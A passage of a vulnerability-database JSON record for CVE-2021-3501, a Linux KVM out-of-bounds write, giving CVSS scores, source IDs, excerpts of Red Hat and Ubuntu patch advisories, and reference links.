            "obtainAllPrivilege": null,
            "obtainOtherPrivilege": null,
            "obtainUserPrivilege": null,
            "severity": "Low",
            "trust": 0.9,
            "userInteractionRequired": null,
            "vectorString": "AV:L/AC:L/Au:N/C:N/I:P/A:P",
            "version": "2.0"
          },
          {
            "accessComplexity": "LOW",
            "accessVector": "LOCAL",
            "authentication": "NONE",
            "author": "VULHUB",
            "availabilityImpact": "PARTIAL",
            "baseScore": 3.6,
            "confidentialityImpact": "NONE",
            "exploitabilityScore": 3.9,
            "id": "VHN-391161",
            "impactScore": 4.9,
            "integrityImpact": "PARTIAL",
            "severity": "LOW",
            "trust": 0.1,
            "vectorString": "AV:L/AC:L/AU:N/C:N/I:P/A:P",
            "version": "2.0"
          }
        ],
        "cvssV3": [
          {
            "attackComplexity": "LOW",
            "attackVector": "LOCAL",
            "author": "NVD",
            "availabilityImpact": "HIGH",
            "baseScore": 7.1,
            "baseSeverity": "HIGH",
            "confidentialityImpact": "NONE",
            "exploitabilityScore": 1.8,
            "impactScore": 5.2,
            "integrityImpact": "HIGH",
            "privilegesRequired": "LOW",
            "scope": "UNCHANGED",
            "trust": 1.0,
            "userInteraction": "NONE",
            "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:H",
            "version": "3.1"
          },
          {
            "attackComplexity": "Low",
            "attackVector": "Local",
            "author": "NVD",
            "availabilityImpact": "High",
            "baseScore": 7.1,
            "baseSeverity": "High",
            "confidentialityImpact": "None",
            "exploitabilityScore": null,
            "id": "CVE-2021-3501",
            "impactScore": null,
            "integrityImpact": "High",
            "privilegesRequired": "Low",
            "scope": "Unchanged",
            "trust": 0.8,
            "userInteraction": "None",
            "vectorString": "CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:H",
            "version": "3.0"
          }
        ],
        "severity": [
          {
            "author": "NVD",
            "id": "CVE-2021-3501",
            "trust": 1.8,
            "value": "HIGH"
          },
          {
            "author": "CNNVD",
            "id": "CNNVD-202105-271",
            "trust": 0.6,
            "value": "HIGH"
          },
          {
            "author": "VULHUB",
            "id": "VHN-391161",
            "trust": 0.1,
            "value": "LOW"
          },
          {
            "author": "VULMON",
            "id": "CVE-2021-3501",
            "trust": 0.1,
            "value": "LOW"
          }
        ]
      }
    ],
    "sources": [
      {
        "db": "VULHUB",
        "id": "VHN-391161"
      },
      {
        "db": "VULMON",
        "id": "CVE-2021-3501"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2021-006584"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-202105-271"
      },
      {
        "db": "NVD",
        "id": "CVE-2021-3501"
      }
    ]
  },
  "description": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/description#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": "A flaw was found in the Linux kernel in versions before 5.12. The value of internal.ndata, in the KVM API, is mapped to an array index, which can be updated by a user process at anytime which could lead to an out-of-bounds write. The highest threat from this vulnerability is to data integrity and system availability. Linux Kernel Is vulnerable to an out-of-bounds write.Information is tampered with and denial of service (DoS) It may be put into a state. KVM is one of the kernel-based virtual machines. This vulnerability could result in an out-of-bounds write. Description:\n\nRed Hat Advanced Cluster Management for Kubernetes 2.2.4 images\n\nRed Hat Advanced Cluster Management for Kubernetes provides the\ncapabilities to address common challenges that administrators and site\nreliability\nengineers face as they work across a range of public and private cloud\nenvironments. \nClusters and applications are all visible and managed from a single\nconsole\u2014with security policy built in. See\nthe following Release Notes documentation, which will be updated shortly\nfor\nthis release, for additional details about this release:\n\nhttps://access.redhat.com/documentation/en-us/red_hat_advanced_cluster_mana\ngement_for_kubernetes/2.2/html/release_notes/\n\nSecurity fixes:\n\n* redisgraph-tls: redis: integer overflow when configurable limit for\nmaximum supported bulk input size is too big on 32-bit platforms\n(CVE-2021-21309)\n\n* console-header-container: nodejs-netmask: improper input validation of\noctal input data (CVE-2021-28092)\n\n* console-container: nodejs-is-svg: ReDoS via malicious string\n(CVE-2021-28918)\n\nBug fixes: \n\n* RHACM 2.2.4 images (BZ# 1957254)\n\n* Enabling observability for OpenShift Container Storage with RHACM 2.2 on\nOCP 4.7 (BZ#1950832)\n\n* ACM Operator should support using the default route TLS (BZ# 1955270)\n\n* The scrolling bar for search filter does not work properly (BZ# 1956852)\n\n* Limits on Length of MultiClusterObservability Resource Name (BZ# 1959426)\n\n* The proxy setup in install-config.yaml is not worked when IPI installing\nwith RHACM (BZ# 1960181)\n\n* Unable to make SSH connection to a Bitbucket server (BZ# 1966513)\n\n* Observability Thanos store shard crashing - cannot unmarshall DNS message\n(BZ# 1967890)\n\n3. Bugs fixed (https://bugzilla.redhat.com/):\n\n1932634 - CVE-2021-21309 redis: integer overflow when configurable limit for maximum supported bulk input size is too big on 32-bit platforms\n1939103 - CVE-2021-28092 nodejs-is-svg: ReDoS via malicious string\n1944827 - CVE-2021-28918 nodejs-netmask: improper input validation of octal input data\n1950832 - Enabling observability for OpenShift Container Storage with RHACM 2.2 on OCP 4.7\n1952150 - [DDF] It would be great to see all the options available for the bucket configuration and which attributes are mandatory\n1954506 - [DDF] Table does not contain data about 20 clusters. Now it\u0027s difficult to estimate CPU usage with larger clusters\n1954535 - Reinstall Submariner - No endpoints found on one cluster\n1955270 - ACM Operator should support using the default route TLS\n1956852 - The scrolling bar for search filter does not work properly\n1957254 - RHACM 2.2.4 images\n1959426 - Limits on Length of MultiClusterObservability Resource Name\n1960181 - The proxy setup in install-config.yaml is not worked when IPI installing with RHACM. \n1963128 - [DDF] Please rename this to \"Amazon Elastic Kubernetes Service\"\n1966513 - Unable to make SSH connection to a Bitbucket server\n1967357 - [DDF] When I clicked on this yaml, I get a HTTP 404 error. \n1967890 - Observability Thanos store shard crashing - cannot unmarshal DNS message\n\n5. Description:\n\nRed Hat OpenShift Container Platform is Red Hat\u0027s cloud computing\nKubernetes application platform solution designed for on-premise or private\ncloud deployments. \n\nThis advisory contains the container images for Red Hat OpenShift Container\nPlatform 4.7.16. See the following advisories for the RPM packages for this\nrelease:\n\nhttps://access.redhat.com/errata/RHBA-2287\n\nSpace precludes documenting all of the container images in this advisory. \n\nAdditional Changes:\n\nThis update also fixes several bugs. Documentation for these changes is\navailable from the Release Notes document linked to in the References\nsection. Solution:\n\nFor OpenShift Container Platform 4.7 see the following documentation, which\nwill be updated shortly for this release, for important instructions on how\nto upgrade your cluster and fully apply this asynchronous errata update:\n\nhttps://docs.openshift.com/container-platform/4.7/release_notes/ocp-4-7-rel\nease-notes.html\n\nDetails on how to access this content are available at\nhttps://docs.openshift.com/container-platform/4.7/updating/updating-cluster\n- -cli.html\n\n4. Bugs fixed (https://bugzilla.redhat.com/):\n\n1889659 - [Assisted-4.6] [cluster validation] Number of hosts validation is not enforced when Automatic role assigned\n1921650 - CVE-2021-3121 gogo/protobuf: plugin/unmarshal/unmarshal.go lacks certain index validation\n1932638 - Removing ssh keys MC does not remove the key from authorized_keys\n1934180 - vsphere-problem-detector should check if datastore is part of datastore cluster\n1937396 - when kuryr quotas are unlimited, we should not sent alerts\n1939014 - [OSP] First public endpoint is used to fetch ignition config from Glance URL (with multiple endpoints) on OSP\n1939553 - Binary file uploaded to a secret in OCP 4 GUI is not properly converted to Base64-encoded string\n1940275 - [IPI Baremetal] Revert Sending full ignition to masters\n1942603 - [4.7z] Network policies in ovn-kubernetes don\u0027t support external traffic from router when the endpoint publishing strategy is HostNetwork\n1944046 - Warn users when using an unsupported browser such as IE\n1944575 - Duplicate alert rules are displayed on console for thanos-querier api return wrong results\n1945702 - Operator dependency not consistently chosen from default channel\n1946682 - [OVN] Source IP is not EgressIP if configured allow 0.0.0.0/0 in the EgressFirewall\n1947091 - Incorrect skipped status for conditional tasks in the pipeline run\n1947427 - Bootstrap ignition shim doesn\u0027t follow proxy settings\n1948398 - [oVirt] remove ovirt_cafile from ovirt-credentials secret\n1949541 - Kuryr-Controller crashes when it\u0027s missing the status object\n1950290 - KubeClientCertificateExpiration alert is confusing, without explanation in the documentation\n1951210 - Pod log filename no longer in \u003cpod-name\u003e-\u003ccontainer-name\u003e.log format\n1953475 - worker pool went degraded due to no rpm-ostree on rhel worker during applying new mc\n1954121 - [ceo] [release-4.7] Operator goes degraded when a second internal node ip is added after install\n1955210 - OCP 4.6 Build fails when filename contains an umlaut\n1955418 - 4.8 -\u003e 4.7 rollbacks broken on unrecognized flowschema openshift-etcd-operator\n1955482 - [4.7] Drop high-cardinality metrics from kube-state-metrics which aren\u0027t used\n1955600 - e2e unidling test flakes in CI\n1956565 - Need ACM Managed Cluster Info metric enabled for OCP monitoring telemetry\n1956980 - OVN-Kubernetes leaves stale AddressSets around if the deletion was missed. \n1957308 - Customer tags cannot be seen in S3 level when set spec.managementState from Managed-\u003e Removed-\u003e Managed in configs.imageregistry with high ratio\n1957499 - OperatorHub - console accepts any value for \"Infrastructure features\" annotation\n1958416 - openshift-oauth-apiserver apiserver pod crashloopbackoffs\n1958467 - [4.7] Webscale: sriov vfs are not created and sriovnetworknodestate indicates sync succeeded - state is not correct\n1958873 - Device Replacemet UI, The status of the disk is \"replacement ready\" before I clicked on \"start replacement\"\n1959546 - [4.7] storage-operator/vsphere-problem-detector causing upgrades to fail that would have succeeded in past versions\n1959737 - Unable to assign nodes for EgressIP even if the egress-assignable label is set\n1960093 - Console not works well against a proxy in front of openshift clusters\n1960111 - Port 8080 of oVirt CSI driver is causing collisions with other services\n1960542 - manifests: invalid selector in ServiceMonitor makes CVO hotloop\n1960544 - Overly generic CSS rules for dd and dt elements breaks styling elsewhere in console\n1960562 - manifests: invalid selector in ServiceMonitor makes CVO hotloop\n1960589 - manifests: extra \"spec.version\" in console quickstarts makes CVO hotloop\n1960645 - [Backport 4.7] Add virt_platform metric to the collected metrics\n1960686 - GlobalConfigPage is constantly requesting resources\n1961069 - CMO end-to-end tests work only on AWS\n1961367 - Conformance tests for OpenStack require the Cinder client that is not included in the \"tests\" image\n1961518 - manifests: invalid selector in ServiceMonitor makes CVO hotloop\n1961557 - [release-4.7] respect the shutdown-delay-duration from OpenShiftAPIServerConfig\n1961719 - manifests: invalid namespace in ClusterRoleBinding makes CVO hotloop\n1961887 - TaskRuns Tab in PipelineRun Details Page makes cluster based calls for TaskRuns\n1962314 - openshift-marketplace pods in CrashLoopBackOff state after RHACS installed with an SCC with readOnlyFileSystem set to true\n1962493 - Kebab menu of taskrun contains Edit options which should not be present\n1962637 - Nodes tainted after configuring additional host iface\n1962819 - OCP v4.7 installation with OVN-Kubernetes fails with error \"egress bandwidth restriction -1 is not equals\"\n1962949 - e2e-metal-ipi and related jobs fail to bootstrap due to multipe VIP\u0027s\n1963141 - packageserver clusteroperator Available condition set to false on any Deployment spec change\n1963243 - HAproxy pod logs showing error \"another server named \u0027pod:httpd-7c7ccfffdc-wdkvk:httpd:8080-tcp:10.128.x.x:8080\u0027 was already defined at line 326, please use distinct names\"\n1964322 - UI, The status of \"Used Capacity Breakdown [Pods]\"  is \"Not available\"\n1964568 - Failed to upgrade from 4.6.25 to 4.7.8 due to the machine-config degradation\n1965075 - [4.7z] After upgrade from 4.5.16 to 4.6.17, customer\u0027s application is seeing re-transmits\n1965932 - [oauth-server] bump k8s.io/apiserver to 1.20.3\n1966358 - Build failure on s390x\n1966798 - [tests] Release 4.7 broken due to the usage of wrong OCS version\n1966810 - Failing Test vendor/k8s.io/kube-aggregator/pkg/apiserver TestProxyCertReload due to hardcoded certificate expiration\n1967328 - [IBM][ROKS] Enable volume snapshot controllers on IBM Cloud\n1967966 - prometheus-k8s pods can\u0027t be scheduled due to volume node affinity conflict\n1967972 - [calico] rbac-proxy container in kube-proxy fails to create tokenreviews\n1970322 - [OVN]EgressFirewall doesn\u0027t work well as expected\n\n5. -----BEGIN PGP SIGNED MESSAGE-----\nHash: SHA256\n\n=====================================================================\n                   Red Hat Security Advisory\n\nSynopsis:          Important: Red Hat Virtualization Host security update [ovirt-4.4.6]\nAdvisory ID:       RHSA-2021:2522-01\nProduct:           Red Hat Virtualization\nAdvisory URL:      https://access.redhat.com/errata/RHSA-2021:2522\nIssue date:        2021-06-22\nCVE Names:         CVE-2020-24489 CVE-2021-3501 CVE-2021-3560 \n                   CVE-2021-27219 \n=====================================================================\n\n1. Summary:\n\nAn update for imgbased, redhat-release-virtualization-host, and\nredhat-virtualization-host is now available for Red Hat Virtualization 4\nfor Red Hat Enterprise Linux 8. \n\nRed Hat Product Security has rated this update as having a security impact\nof Important. A Common Vulnerability Scoring System (CVSS) base score,\nwhich gives a detailed severity rating, is available for each vulnerability\nfrom the CVE link(s) in the References section. \n\n2. Relevant releases/architectures:\n\nRHEL 8-based RHEV-H for RHEV 4 (build requirements) - noarch, x86_64\nRed Hat Virtualization 4 Hypervisor for RHEL 8 - x86_64\n\n3. Description:\n\nThe redhat-virtualization-host packages provide the Red Hat Virtualization\nHost. These packages include redhat-release-virtualization-host,\novirt-node, and rhev-hypervisor. Red Hat Virtualization Hosts (RHVH) are\ninstalled using a special build of Red Hat Enterprise Linux with only the\npackages required to host virtual machines. RHVH features a Cockpit user\ninterface for monitoring the host\u0027s resources and performing administrative\ntasks. \n\nThe redhat-virtualization-host packages provide the Red Hat Virtualization\nHost. These packages include redhat-release-virtualization-host,\novirt-node, and rhev-hypervisor. Red Hat Virtualization Hosts (RHVH) are\ninstalled using a special build of Red Hat Enterprise Linux with only the\npackages required to host virtual machines. RHVH features a Cockpit user\ninterface for monitoring the host\u0027s resources and performing administrative\ntasks. \n\nThe ovirt-node-ng packages provide the Red Hat Virtualization Host. These\npackages include redhat-release-virtualization-host, ovirt-node, and\nrhev-hypervisor. Red Hat Virtualization Hosts (RHVH) are installed using a\nspecial build of Red Hat Enterprise Linux with only the packages required\nto host virtual machines. RHVH features a Cockpit user interface for\nmonitoring the host\u0027s resources and performing administrative tasks. \n\nSecurity Fix(es):\n\n* glib: integer overflow in g_bytes_new function on 64-bit platforms due to\nan implicit cast from 64 bits to 32 bits (CVE-2021-27219)\n\n* kernel: userspace applications can misuse the KVM API to cause a write of\n16 bytes at an offset up to 32 GB from vcpu-\u003erun (CVE-2021-3501)\n\n* polkit: local privilege escalation using\npolkit_system_bus_name_get_creds_sync() (CVE-2021-3560)\n\n* hw: vt-d related privilege escalation (CVE-2020-24489)\n\nFor more details about the security issue(s), including the impact, a CVSS\nscore, and other related information, refer to the CVE page(s) listed in\nthe References section. \n\nBug Fix(es):\n\n* Previously, systemtap dependencies were not included in the RHV-H\nchannel. Therefore, systemtap could not be installed. \nIn this release, the systemtap dependencies have been included in the\nchannel, resolving the issue. (BZ#1903997)\n\n4. Solution:\n\nBefore applying this update, make sure all previously released errata\nrelevant to your system have been applied. \n\nFor details on how to apply this update, refer to:\n\nhttps://access.redhat.com/articles/2974891\n\n5. Bugs fixed (https://bugzilla.redhat.com/):\n\n1903997 - Provide systemtap dependencies within RHV-H channel\n1929858 - CVE-2021-27219 glib: integer overflow in g_bytes_new function on 64-bit platforms due to an implicit cast from 64 bits to 32 bits\n1950136 - CVE-2021-3501 kernel: userspace applications can misuse the KVM API to cause a write of 16 bytes at an offset up to 32 GB from vcpu-\u003erun\n1961710 - CVE-2021-3560 polkit: local privilege escalation using polkit_system_bus_name_get_creds_sync()\n1962650 - CVE-2020-24489 hw: vt-d related privilege escalation\n\n6. Package List:\n\nRed Hat Virtualization 4 Hypervisor for RHEL 8:\n\nSource:\nredhat-virtualization-host-4.4.6-20210615.0.el8_4.src.rpm\n\nx86_64:\nredhat-virtualization-host-image-update-4.4.6-20210615.0.el8_4.x86_64.rpm\n\nRHEL 8-based RHEV-H for RHEV 4 (build requirements):\n\nSource:\nredhat-release-virtualization-host-4.4.6-2.el8ev.src.rpm\n\nnoarch:\nredhat-virtualization-host-image-update-placeholder-4.4.6-2.el8ev.noarch.rpm\n\nx86_64:\nredhat-release-virtualization-host-4.4.6-2.el8ev.x86_64.rpm\n\nThese packages are GPG signed by Red Hat for security.  Our key and\ndetails on how to verify the signature are available from\nhttps://access.redhat.com/security/team/key/\n\n7. References:\n\nhttps://access.redhat.com/security/cve/CVE-2020-24489\nhttps://access.redhat.com/security/cve/CVE-2021-3501\nhttps://access.redhat.com/security/cve/CVE-2021-3560\nhttps://access.redhat.com/security/cve/CVE-2021-27219\nhttps://access.redhat.com/security/updates/classification/#important\n\n8. Contact:\n\nThe Red Hat security contact is \u003csecalert@redhat.com\u003e. More contact\ndetails at https://access.redhat.com/security/team/contact/\n\nCopyright 2021 Red Hat, Inc. \n-----BEGIN PGP SIGNATURE-----\nVersion: GnuPG v1\n\niQIVAwUBYNH6EtzjgjWX9erEAQg8rBAApw3Jn/EPQosAw8RDA053A4aCxO2gHC15\nHK1kJ2gSn73kahmvvl3ZAFQW3Wa/OKZRFnbOKZPcJvKeVKnmeHdjmX6V/wNC/bAO\ni2bc69+GYd+mj3+ngKmTyFFVSsgDWCfFv6lwMl74d0dXYauCfMTiMD/K/06zaQ3b\narTdExk9VynIcr19ggOfhGWAe5qX8ZXfPHwRAmDBNZCUjzWm+c+O+gQQiy/wWzMB\n6vbtEqKeXfT1XgxjdQO5xfQ4Fvd8ssKXwOjdymCsEoejplVFmO3reBrl+y95P3p9\nBCKR6/cWKzhaAXfS8jOlZJvxA0TyxK5+HOP8pGWGfxBixXVbaFR4E/+rnA1E04jp\nlGXvby0yq1Q3u4/dYKPn7oai1H7b7TOaCKrmTMy3Nwd5mKiT+CqYk2Va0r2+Cy/2\njH6CeaSKJIBFviUalmc7ZbdPR1zfa1LEujaYp8aCez8pNF0Mopf5ThlCwlZdEdxG\naTK1VPajNj2i8oveRPgNAzIu7tMh5Cibyo92nkfjhV9ube7WLg4fBKbX/ZfCBS9y\nosA4oRWUFbJYnHK6Fbr1X3mIYIq0s2y0MO2QZWj8hvzMT+BcQy5byreU4Y6o8ikl\nhXz6yl7Cu6X7wm32QZNZMWbUwJfksJRBR+dfkhDcGV0/zQpMZpwHDXs06kal9vsY\nDRQj4fNuEQo=\n=bDgd\n-----END PGP SIGNATURE-----\n\n--\nRHSA-announce mailing list\nRHSA-announce@redhat.com\nhttps://listman.redhat.com/mailman/listinfo/rhsa-announce\n. 8) - x86_64\n\n3. Description:\n\nThe kernel-rt packages provide the Real Time Linux Kernel, which enables\nfine-tuning for systems with extremely high determinism requirements. \n\nBug Fix(es):\n\n* kernel-rt: update RT source tree to the RHEL-8.4.z0 source tree\n(BZ#1957489)\n\n4. Description:\n\nThis is a kernel live patch module which is automatically loaded by the RPM\npost-install script to modify the code of a running kernel. 8) - aarch64, noarch, ppc64le, s390x, x86_64\n\n3. \n\nBug Fix(es):\n\n* OVS mistakenly using local IP as tun_dst for VXLAN packets (?)\n(BZ#1944667)\n\n* Selinux: The task calling security_set_bools() deadlocks with itself when\nit later calls  selinux_audit_rule_match(). (BZ#1945123)\n\n* [mlx5] tc flower mpls match options does not work (BZ#1952061)\n\n* mlx5: missing patches for ct.rel (BZ#1952062)\n\n* CT HWOL: with OVN/OVS, intermittently, load balancer hairpin TCP packets\nget dropped for seconds in a row (BZ#1952065)\n\n* [Lenovo 8.3 bug] Blackscreen after clicking on \"Settings\" icon from\ntop-right corner. (BZ#1952900)\n\n* RHEL 8.x missing uio upstream fix. (BZ#1952952)\n\n* Turbostat doesn\u0027t show any measured data on AMD Milan (BZ#1952987)\n\n* P620 no sound from front headset jack (BZ#1954545)\n\n* RHEL kernel 8.2 and higher are affected by data corruption bug in raid1\narrays using bitmaps. (BZ#1955188)\n\n* [net/sched] connection failed with DNAT + SNAT by tc action ct\n(BZ#1956458)\n\n4. ==========================================================================\nUbuntu Security Notice USN-4983-1\nJune 03, 2021\n\nlinux-oem-5.10 vulnerabilities\n==========================================================================\n\nA security issue affects these releases of Ubuntu and its derivatives:\n\n- Ubuntu 20.04 LTS\n\nSummary:\n\nSeveral security issues were fixed in the Linux kernel. A local attacker\ncould use this to cause a denial of service (system crash) or possibly\nexecute arbitrary code. (CVE-2021-33200)\n\nPiotr Krysiuk and Benedict Schlueter discovered that the eBPF\nimplementation in the Linux kernel performed out of bounds speculation on\npointer arithmetic. A local attacker could use this to expose sensitive\ninformation. (CVE-2021-29155)\n\nPiotr Krysiuk discovered that the eBPF implementation in the Linux kernel\ndid not properly prevent speculative loads in certain situations. A local\nattacker could use this to expose sensitive information (kernel memory). A local attacker\ncould use this to cause a denial of service (system crash) or possibly\nexecute arbitrary code. (CVE-2021-3501)\n\nUpdate instructions:\n\nThe problem can be corrected by updating your system to the following\npackage versions:\n\nUbuntu 20.04 LTS:\n  linux-image-5.10.0-1029-oem     5.10.0-1029.30\n  linux-image-oem-20.04           5.10.0.1029.30\n  linux-image-oem-20.04b          5.10.0.1029.30\n\nAfter a standard system update you need to reboot your computer to make\nall the necessary changes. \n\nATTENTION: Due to an unavoidable ABI change the kernel updates have\nbeen given a new version number, which requires you to recompile and\nreinstall all third party kernel modules you might have installed. \nUnless you manually uninstalled the standard kernel metapackages\n(e.g. linux-generic, linux-generic-lts-RELEASE, linux-virtual,\nlinux-powerpc), a standard system upgrade will automatically perform\nthis as well",
    "sources": [
      {
        "db": "NVD",
        "id": "CVE-2021-3501"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2021-006584"
      },
      {
        "db": "VULHUB",
        "id": "VHN-391161"
      },
      {
        "db": "VULMON",
        "id": "CVE-2021-3501"
      },
      {
        "db": "PACKETSTORM",
        "id": "163188"
      },
      {
        "db": "PACKETSTORM",
        "id": "163149"
      },
      {
        "db": "PACKETSTORM",
        "id": "163242"
      },
      {
        "db": "PACKETSTORM",
        "id": "162881"
      },
      {
        "db": "PACKETSTORM",
        "id": "162882"
      },
      {
        "db": "PACKETSTORM",
        "id": "162890"
      },
      {
        "db": "PACKETSTORM",
        "id": "162977"
      }
    ],
    "trust": 2.43
  },
  "external_ids": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/external_ids#",
      "data": {
        "@container": "@list"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": [
      {
        "db": "NVD",
        "id": "CVE-2021-3501",
        "trust": 4.1
      },
      {
        "db": "PACKETSTORM",
        "id": "162977",
        "trust": 0.8
      },
      {
        "db": "PACKETSTORM",
        "id": "163149",
        "trust": 0.8
      },
      {
        "db": "PACKETSTORM",
        "id": "162881",
        "trust": 0.8
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2021-006584",
        "trust": 0.8
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-202105-271",
        "trust": 0.7
      },
      {
        "db": "PACKETSTORM",
        "id": "162936",
        "trust": 0.7
      },
      {
        "db": "AUSCERT",
        "id": "ESB-2021.1945",
        "trust": 0.6
      },
      {
        "db": "AUSCERT",
        "id": "ESB-2021.1919",
        "trust": 0.6
      },
      {
        "db": "AUSCERT",
        "id": "ESB-2021.1868",
        "trust": 0.6
      },
      {
        "db": "AUSCERT",
        "id": "ESB-2021.2131",
        "trust": 0.6
      },
      {
        "db": "PACKETSTORM",
        "id": "162890",
        "trust": 0.2
      },
      {
        "db": "PACKETSTORM",
        "id": "162882",
        "trust": 0.2
      },
      {
        "db": "PACKETSTORM",
        "id": "163242",
        "trust": 0.2
      },
      {
        "db": "VULHUB",
        "id": "VHN-391161",
        "trust": 0.1
      },
      {
        "db": "VULMON",
        "id": "CVE-2021-3501",
        "trust": 0.1
      },
      {
        "db": "PACKETSTORM",
        "id": "163188",
        "trust": 0.1
      }
    ],
    "sources": [
      {
        "db": "VULHUB",
        "id": "VHN-391161"
      },
      {
        "db": "VULMON",
        "id": "CVE-2021-3501"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2021-006584"
      },
      {
        "db": "PACKETSTORM",
        "id": "163188"
      },
      {
        "db": "PACKETSTORM",
        "id": "163149"
      },
      {
        "db": "PACKETSTORM",
        "id": "163242"
      },
      {
        "db": "PACKETSTORM",
        "id": "162881"
      },
      {
        "db": "PACKETSTORM",
        "id": "162882"
      },
      {
        "db": "PACKETSTORM",
        "id": "162890"
      },
      {
        "db": "PACKETSTORM",
        "id": "162977"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-202105-271"
      },
      {
        "db": "NVD",
        "id": "CVE-2021-3501"
      }
    ]
  },
  "id": "VAR-202105-0904",
  "iot": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/iot#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": true,
    "sources": [
      {
        "db": "VULHUB",
        "id": "VHN-391161"
      }
    ],
    "trust": 0.01
  },
  "last_update_date": "2024-07-23T19:50:13.905000Z",
  "patch": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/patch#",
      "data": {
        "@container": "@list"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": [
      {
        "title": "Bug\u00a01950136",
        "trust": 0.8,
        "url": "http://www.kernel.org"
      },
      {
        "title": "Linux kernel Buffer error vulnerability fix",
        "trust": 0.6,
        "url": "http://www.cnnvd.org.cn/web/xxk/bdxqbyid.tag?id=150809"
      },
      {
        "title": "Red Hat: CVE-2021-3501",
        "trust": 0.1,
        "url": "https://vulmon.com/vendoradvisory?qidtp=red_hat_cve_database\u0026qid=cve-2021-3501"
      },
      {
        "title": "Arch Linux Issues: ",
        "trust": 0.1,
        "url": "https://vulmon.com/vendoradvisory?qidtp=arch_linux_issues\u0026qid=cve-2021-3501 log"
      }
    ],
    "sources": [
      {
        "db": "VULMON",
        "id": "CVE-2021-3501"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2021-006584"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-202105-271"
      }
    ]
  },
  "problemtype_data": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": [
      {
        "problemtype": "CWE-787",
        "trust": 1.1
      },
      {
        "problemtype": "Out-of-bounds writing (CWE-787) [ Other ]",
        "trust": 0.8
      }
    ],
    "sources": [
      {
        "db": "VULHUB",
        "id": "VHN-391161"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2021-006584"
      },
      {
        "db": "NVD",
        "id": "CVE-2021-3501"
      }
    ]
  },
  "references": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/references#",
      "data": {
        "@container": "@list"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": [
      {
        "trust": 1.8,
        "url": "https://bugzilla.redhat.com/show_bug.cgi?id=1950136"
      },
      {
        "trust": 1.8,
        "url": "https://git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux.git/commit/?id=04c4f2ee3f68c9a4bf1653d15f1a9a435ae33f7a"
      },
      {
        "trust": 1.4,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2021-3501"
      },
      {
        "trust": 1.1,
        "url": "https://security.netapp.com/advisory/ntap-20210618-0008/"
      },
      {
        "trust": 0.7,
        "url": "https://access.redhat.com/security/cve/cve-2021-3501"
      },
      {
        "trust": 0.6,
        "url": "https://listman.redhat.com/mailman/listinfo/rhsa-announce"
      },
      {
        "trust": 0.6,
        "url": "https://bugzilla.redhat.com/):"
      },
      {
        "trust": 0.6,
        "url": "https://access.redhat.com/security/team/contact/"
      },
      {
        "trust": 0.6,
        "url": "https://packetstormsecurity.com/files/162977/ubuntu-security-notice-usn-4983-1.html"
      },
      {
        "trust": 0.6,
        "url": "https://www.auscert.org.au/bulletins/esb-2021.2131"
      },
      {
        "trust": 0.6,
        "url": "https://www.auscert.org.au/bulletins/esb-2021.1919"
      },
      {
        "trust": 0.6,
        "url": "https://packetstormsecurity.com/files/163149/red-hat-security-advisory-2021-2286-01.html"
      },
      {
        "trust": 0.6,
        "url": "https://vigilance.fr/vulnerability/linux-kernel-memory-corruption-via-kvm-35276"
      },
      {
        "trust": 0.6,
        "url": "https://packetstormsecurity.com/files/162936/ubuntu-security-notice-usn-4977-1.html"
      },
      {
        "trust": 0.6,
        "url": "https://packetstormsecurity.com/files/162881/red-hat-security-advisory-2021-2169-01.html"
      },
      {
        "trust": 0.6,
        "url": "https://www.auscert.org.au/bulletins/esb-2021.1868"
      },
      {
        "trust": 0.6,
        "url": "https://www.auscert.org.au/bulletins/esb-2021.1945"
      },
      {
        "trust": 0.4,
        "url": "https://access.redhat.com/security/cve/cve-2021-3543"
      },
      {
        "trust": 0.4,
        "url": "https://access.redhat.com/security/updates/classification/#important"
      },
      {
        "trust": 0.4,
        "url": "https://access.redhat.com/security/team/key/"
      },
      {
        "trust": 0.3,
        "url": "https://access.redhat.com/security/cve/cve-2021-27219"
      },
      {
        "trust": 0.3,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2021-3543"
      },
      {
        "trust": 0.3,
        "url": "https://access.redhat.com/articles/11258"
      },
      {
        "trust": 0.2,
        "url": "https://access.redhat.com/security/updates/classification/#moderate"
      },
      {
        "trust": 0.2,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2021-27219"
      },
      {
        "trust": 0.1,
        "url": "https://cwe.mitre.org/data/definitions/787.html"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2019-25039"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2020-8286"
      },
      {
        "trust": 0.1,
